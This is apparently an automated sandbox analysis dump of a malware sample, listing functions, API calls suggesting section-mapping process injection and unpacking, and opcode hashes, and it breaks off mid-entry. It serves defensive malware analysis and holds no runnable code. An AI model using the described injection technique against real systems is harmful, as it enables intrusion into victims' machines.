Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02BF003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BF024D

Strings

cess, xrefs: 02BF018D
kernel32.dll, xrefs: 02BF008F, 02BF0095

Memory Dump Source

Source File: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2bf0000_565.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c46072ac14fadc6c14f4da61cc6c098fcb884d1b5859fc903d461aa0a5fc68b9
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 2B527E74A01229DFDBA4DF58C984BACBBB1BF09304F1484D9E54DA7366DB30AA85CF14

Function 004154C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041559F
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004155DC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004155FB

Strings

, xrefs: 00415505

Memory Dump Source

Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_565.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02C6A76C Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C6A794
Module32First.KERNEL32(00000000,00000224), ref: 02C6A7B4

Memory Dump Source

Source File: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c67000_565.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: fa69604d953707667b37d6a3cc799224cf6dfba9e90aab3ff07ec217afbf80cc
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EAF06D32600714BBE7203AF9ACCCB7A76F8AF89625F101569E646E14C0DB70E9464A61

Function 02BF0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02BF0223,?,?), ref: 02BF0E19
SetErrorMode.KERNELBASE(00000000,?,?,02BF0223,?,?), ref: 02BF0E1E

Memory Dump Source

Source File: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2bf0000_565.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 493a6c6bdc8abdcb9cbbc839ae6066722017b708e17f1d27ef97698133936497
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 64D01231545128B7D7403A94DC09BCD7B1CDF09B66F008451FB0DD9481C770954046E5

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02C6A42B Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C6A47C

Memory Dump Source

Source File: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c67000_565.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ff4bab7f20f058aa9867299383e09e45cc72e0a4cc19227f3bee5901b7cdebc5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D8113F79A00208EFDB01DF98C989E98BBF5AF08350F058094F948AB361D375EA50DF90

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 00415490 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415B2B), ref: 00415498

Memory Dump Source

Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_565.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 00401E65 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_565.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

Function 00415690 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004156C1
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 004156E5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004156ED
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041572D
GetComputerNameW.KERNEL32(?,?), ref: 00415741
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041574F
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 0041575E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041576F

Strings

-, xrefs: 0041577C

Memory Dump Source

Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_565.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
Instruction ID: 7fd8cb6729a01aa94056f6f289b2ac9cdf2ab28260b2dbd3fc15e2ce888fda3c
Opcode Fuzzy Hash: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
Instruction Fuzzy Hash: C221F731A44304EBD721DFA4DC86BD97B70FB4C712F5140AAFA4DAA1C0CAB459C4CB59

Function 004157B0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 004157E4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004157FF
HeapDestroy.KERNEL32(00000000), ref: 0041581E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415826

Memory Dump Source

Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_565.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
Instruction ID: 68d425cf78a880d44cb9589aafc5291418f972827432eabaf25cd50abb90a3e4
Opcode Fuzzy Hash: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
Instruction Fuzzy Hash: 2401F270A82604DBE740FBB4ED89BDA7BA8F70C346F800036E60997280DA345C54CB9A

Analysis Process: fgbwcitPID: 6596, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	16.5%
Signature Coverage:	0%
Total number of Nodes:	170
Total number of Limit Nodes:	9

Executed Functions

Function 00415840 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415912
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041592B
FindAtomW.KERNEL32(00000000), ref: 00415932
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041593A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415952
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415979
MoveFileW.KERNEL32(00000000,00000000), ref: 00415981
GetVersionExW.KERNEL32(?), ref: 0041598E
DisconnectNamedPipe.KERNEL32(?), ref: 004159A1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004159E6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004159F5
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415A0B
PulseEvent.KERNEL32(00000000), ref: 00415A1B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415A44
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415A75
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415A86
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415A8E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415ACE
GetFileAttributesA.KERNEL32(00000000), ref: 00415AD5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415ADB
GetBinaryType.KERNEL32(0041742C,?), ref: 00415AED
LoadLibraryA.KERNELBASE(00417438), ref: 00415B72

Strings

}$, xrefs: 00415BC7
k`, xrefs: 00415BA3

Memory Dump Source

Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
Instruction ID: 1a4de0b24bdd0306310a4676e1e64ec04895e512500ce6235e9595c5278ae4d7
Opcode Fuzzy Hash: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
Instruction Fuzzy Hash: 3AA1F271802924EBC720EB65EC44ADF7B79FF89341F41406AF50AA7150DB385A81CFAD

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

